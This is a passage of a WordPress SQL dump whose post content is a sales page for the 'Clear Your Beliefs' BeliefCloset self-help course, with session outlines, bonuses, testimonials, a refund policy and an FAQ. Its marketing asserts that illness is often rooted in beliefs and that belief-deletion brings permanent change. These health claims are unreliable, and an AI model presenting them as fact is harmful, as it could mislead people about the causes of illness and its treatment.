poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'DCW', '', 'publish', 'closed', 'closed', '', 'dcw', '', '', '2015-08-06 00:22:47', '2015-08-06 05:22:47', '', 2233, 'http://clearyourbeliefs.com/?page_id=2235', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2236, 2, '2015-08-06 00:24:08', '2015-08-06 05:24:08', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as 